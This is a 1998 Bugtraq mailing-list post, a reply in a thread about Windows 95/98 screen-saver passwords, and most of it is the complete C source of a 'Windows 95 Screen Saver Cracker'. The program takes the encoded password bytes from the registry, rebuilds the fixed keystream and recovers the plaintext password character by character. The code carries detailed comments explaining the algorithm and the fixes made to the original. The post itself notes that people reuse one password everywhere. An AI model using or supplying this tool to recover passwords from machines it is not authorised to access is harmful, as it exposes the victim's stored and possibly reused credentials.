[6860] in bugtraq
Re: Windows95/98(?) Screensavers
daemon@ATHENA.MIT.EDU (Ryan Veety)
Fri May 29 14:21:57 1998
Date: Thu, 28 May 1998 12:59:40 -0400
Reply-To: Ryan Veety <ryan@RYANSPC.COM>
From: Ryan Veety <ryan@RYANSPC.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: CrazyLinux <kmspill_km@INAME.COM> "Windows95/98(?) Screensavers"
(May 26, 11:31pm)
On May 26, 11:31pm, CrazyLinux wrote:
> Subject: Windows95/98(?) Screensavers
>
> I got the idea to explore a bit on the w95ss password in the registry
> after seeing the bruteforce cracker (using tables of bytes).
>
> (why this is important to bugtraq? loads of people use 1 password for
> everything)
>
> Feel free to recode it in C and post to the list.
>-- End of excerpt from CrazyLinux
I made this a few months ago; it works.
I did not write the original code; I only modified it so that the values shown
by RegEdit could be entered.
------------------ CUT HERE -------------------------
// Original code by Lonely Hawk
// Modified by Ryan Veety to support both RegEdit and text editor codes.
// http://www.ryanspc.com
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// Working 256-entry byte permutation plus two trailing bytes that fixmatrix()
// sets to zero. check() restores it from matrixok and then permutes it further.
unsigned char matrix[256+2];
// Snapshot of matrix taken at the end of fixmatrix(); check() copies it back
// so every call starts from the same state.
unsigned char matrixok[256+2];
// Fixed 4-byte constant mixed into the permutation by fixmatrix(). It is
// compiled in, so the derived byte stream is the same on every run.
unsigned char mystery[4]={ 0xb2, 0xdc, 0x90, 0x8f };
// Shared index: position in mystery[] inside fixmatrix(), position in
// matrix[] inside check().
unsigned char h1;
// Scratch buffers filled by check(): passwd holds the candidate text, pa the
// candidate XORed with the derived bytes. pa is one byte shorter than passwd,
// so any copy between them must be bounded by sizeof(pa).
unsigned char pa[79], passwd[80];
// Target bytes decoded from the user's hex input by parse(); 30 bytes total,
// including the terminating zero parse() appends.
unsigned char tofind[30];
// Second permutation index used by check(), which resets it to 0 on entry.
int h2=4;
// Number of bytes parse() stored in tofind.
unsigned int lentofind;
// Length of the candidate most recently passed to check().
int len;
// Build the initial byte permutation in matrix[] and save a copy in matrixok[].
// The table starts as the identity (0..255) and is then shuffled by one pass of
// swaps driven by the 4-byte constant mystery[]. The update rule has the shape
// of the RC4 key schedule with a fixed 4-byte key. Because the key is a
// compile-time constant, the resulting table is always the same.
// Side effects: writes matrix[], matrixok[] and leaves h1 at 0.
void fixmatrix()
{
    unsigned char prev = 0;
    int pos;

    // Identity permutation, followed by the two zeroed pad bytes.
    for (pos = 0; pos < 256; pos++) {
        matrix[pos] = (unsigned char)pos;
    }
    matrix[256] = 0;
    matrix[257] = 0;

    h1 = 0;
    pos = 0;
    while (pos < 256) {
        unsigned char here = matrix[pos];
        // Swap partner depends on the key byte, the previous partner and the
        // current entry, reduced to a table index.
        int target = (mystery[h1] + prev + here) & 0xff;

        matrix[pos] = matrix[target];
        matrix[target] = here;
        prev = (unsigned char)target;
        // Cycle through the four key bytes.
        h1 = (unsigned char)((h1 + 1) % 4);
        pos++;
    }

    // Keep a pristine copy so check() can restart from it.
    memcpy(matrixok, matrix, sizeof(matrix));
}
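// Transform a candidate string with the fixed byte stream and leave the result
// in the global pa[].
// test: NUL-terminated candidate text. Input longer than pa[] can hold is
//       truncated to sizeof(pa) - 1 bytes; the original copied it with an
//       unbounded strcpy() into passwd[80] and then into the smaller pa[79].
// Side effects: overwrites passwd[], pa[], len, matrix[], h1 and h2.
// The bytes XORed into pa[] are derived only from matrixok[], never from the
// candidate itself, so position i of the output depends only on test[i].
void check(char *test)
{
    unsigned char help1, oldh2;
    size_t n;
    int i;

    // Bounded copy: clamp to the smaller of the two work buffers.
    n = strlen(test);
    if (n > sizeof(pa) - 1)
        n = sizeof(pa) - 1;
    memcpy(passwd, test, n);
    passwd[n] = 0;
    memcpy(pa, passwd, n + 1);
    len = (int)n;

    // Restart from the table saved by fixmatrix().
    memcpy(matrix, matrixok, sizeof(matrix));
    h1 = 0;
    h2 = 0;
    for (i = 0; i < len; i++) {
        h1++;
        h1 = h1 & 0xff;
        oldh2 = matrix[h1];
        h2 = (h2 + matrix[h1]) & 0xff;
        // Swap matrix[h1] and matrix[h2].
        help1 = matrix[h1];
        matrix[h1] = matrix[h2];
        matrix[h2] = help1;
        // Output byte is the table entry indexed by the sum of the two
        // swapped entries.
        help1 = (matrix[h1] + oldh2) & 0xff;
        help1 = matrix[help1];
        pa[i] ^= help1;
    }
}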
// Return 1 when a is an upper-case hexadecimal digit ('0'-'9' or 'A'-'F'),
// otherwise 0. Lower-case 'a'-'f' is rejected.
int is_ok(char a)
{
    int is_digit = (a >= '0' && a <= '9');
    int is_upper_hex = (a >= 'A' && a <= 'F');

    return (is_digit || is_upper_hex) ? 1 : 0;
}
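// Convert one upper-case hexadecimal digit to its value (0-15).
// Returns -1 for any other character. The original fell off the end of the
// function in that case, which is undefined behaviour when the result is used.
int nibble(char c)
{
    if ((c >= 'A') && (c <= 'F'))
        return (10 + c - 'A');
    if ((c >= '0') && (c <= '9'))
        return (c - '0');
    return -1;
}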
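// Decode a list of two-digit upper-case hex codes into the global tofind[].
// inpt: writable NUL-terminated string; codes are separated by tab, space,
//       comma or newline. strtok() modifies it in place.
// On return lentofind holds the number of decoded bytes and tofind[] is
// zero-terminated. Only the first two characters of each token are used.
// Exits the program on a malformed code, or when more codes are supplied than
// tofind[] can hold (the original wrote past the end of the array in that case).
void parse(char *inpt)
{
    char *tok;
    char num[2];

    lentofind = 0;
    tok = strtok(inpt, "\t ,\n");
    while (tok != NULL) {
        // A one-character token has tok[1] == '\0', which is_ok() rejects.
        num[0] = tok[0];
        num[1] = tok[1];
        if ((!is_ok(num[0])) || (!is_ok(num[1]))) {
            puts("Please input strings like: a1,b1,05,c3,d2,f3");
            exit(0);
        }
        // Leave room for the terminating zero written after the loop.
        if (lentofind >= sizeof(tofind) - 1) {
            printf("Too many codes (at most %u are supported)\n",
                   (unsigned int)(sizeof(tofind) - 1));
            exit(EXIT_FAILURE);
        }
        tofind[lentofind++] = 16 * nibble(num[0]) + nibble(num[1]);
        tok = strtok(NULL, "\t ,\n");
    }
    tofind[lentofind] = 0;
}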
// Combine the first two characters of str into one value, treating each as an
// offset from '0': (str[0]-'0')*16 + (str[1]-'0').
// This yields the usual hex value only when both characters are '0'-'9';
// letters are not mapped to 10-15 here.
int hex(char *str)
{
    int high = str[0] - '0';
    int low = str[1] - '0';

    return high * 16 + low;
}
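// Interactive driver: read the stored screen-saver codes, decode them and
// print the text that transforms to those bytes.
// Input is either hex codes as seen in a text editor ("h") or the
// comma-separated byte values shown by RegEdit ("a"), which are first folded
// back into hex-digit characters with hex().
// Changes from the original: returns int, reads lines with fgets() instead of
// gets(), stops at end of input instead of looping forever, never reads past
// the end of the typed line, and refuses more codes than tst[] can hold.
// The search works one position at a time because check() XORs each position
// with a byte that does not depend on the candidate text.
int main(void)
{
    unsigned int i;
    int j, n = 0, odd = 0;
    unsigned char tst[80];
    char inpt[120];
    char ascii[120];
    char temp[3];
    size_t alen, ilen;
    int ans;

    fixmatrix();
    printf("Windows 95 Screen Saver Cracker.\nMade by Lonely Hawk.\n");
    printf("Modified by Ryan Veety http://ryanspc.nws.net\n");
    printf("It now allows both hex and ascii inputs.\n");
    printf("Ascii codes come from RegEdit and hex codes come from a text editor\n\n");

    do {
        printf("Are the codes hex or ascii [h/a]?");
        ans = getchar();
        if (ans == EOF)
            return 1;
        getchar();  // discard the newline that follows the answer
    } while (tolower(ans) != 'h' && tolower(ans) != 'a');

    if (tolower(ans) == 'a') {
        printf("Give me the codes, separated by commas (in ascii):\n >");
        if (fgets(ascii, sizeof(ascii), stdin) == NULL)
            return 1;
        ascii[strcspn(ascii, "\r\n")] = '\0';
        alen = strlen(ascii);

        // Each RegEdit value is two characters plus a separator. Every value
        // becomes one character of inpt, with a comma after every second one.
        // At most 119 input characters give 40 values and 20 commas, which
        // fits in inpt.
        for (i = 0; i + 1 < alen; i += 3) {
            temp[0] = ascii[i];
            temp[1] = ascii[i + 1];
            temp[2] = '\0';
            inpt[n] = (char)hex(temp);
            n++;
            odd++;
            if (odd % 2 == 0 && i + 3 <= alen) {
                inpt[n] = ',';
                n++;
            }
        }
        inpt[n] = '\0';
        printf("The hex codes for the password are: %s\n", inpt);
    } else {
        printf("Give me the codes, separated by commas (in hex):\n >");
        if (fgets(inpt, sizeof(inpt), stdin) == NULL)
            return 1;
        inpt[strcspn(inpt, "\r\n")] = '\0';
    }

    // parse() accepts upper-case hex digits only.
    ilen = strlen(inpt);
    for (i = 0; i < ilen; i++)
        inpt[i] = (char)toupper((unsigned char)inpt[i]);
    parse(inpt);

    // tst holds lentofind characters plus a terminator.
    if (lentofind >= sizeof(tst)) {
        puts("Too many codes");
        return 1;
    }

    for (i = 0; i < lentofind; i++)
        tst[i] = 'A';
    tst[lentofind] = 0;

    // Try ' ' through 'Z' at each position until the transformed byte matches
    // the stored one. If nothing matches, the position is left as 'Z'.
    for (i = 0; i < lentofind; i++) {
        for (j = ' '; j <= 'Z'; j++) {
            tst[i] = (unsigned char)j;
            check((char *)tst);
            if (pa[i] == tofind[i])
                break;
        }
    }
    printf("Password is: %s\n", tst);
    return 0;
}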
--------------------- CUT HERE ---------------------------
--